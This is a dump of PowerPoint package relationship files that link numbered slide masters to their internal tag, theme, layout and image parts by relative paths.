<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag66.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag65.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag62.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme12.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag72.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag71.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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69.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag68.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag67.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme13.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag78.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag77.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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75.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag74.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag73.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme14.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout15.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag84.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag83.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme15.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout16.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag90.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag89.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8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87.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag86.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme16.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout17.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag96.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag95.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag92.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag91.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme17.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag102.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag101.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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99.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag98.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag97.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme18.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout19.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag108.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag107.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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05.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag104.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag103.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout20.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag114.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag113.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag110.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout21.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag120.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag119.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag116.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag115.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout22.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag126.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag122.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag121.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout23.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag132.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag131.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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29.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag128.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag127.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout24.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag138.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag137.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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35.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag134.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag133.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme24.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag144.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag143.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag140.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag139.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag150.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14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47.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag146.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag145.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout27.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1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153.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag152.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag151.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout28.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15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57.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag156.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag155.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout29.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag160.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag159.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.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11.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme30.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag164.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag163.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout31.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme31.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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69.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag168.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag167.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout32.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme32.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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tags" Target="../tags/tag171.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout33.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme33.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17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77.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slideLayout" Target="../slideLayouts/slideLayout34.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme34.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag180.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag179.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout35.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag184.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag183.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout36.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme36.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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89.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slideLayout" Target="../slideLayouts/slideLayout37.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme37.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag192.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag191.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme38.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag198.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197.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag196.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag195.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout39.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme39.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag202.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag200.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag199.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout40.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.svg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster40.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
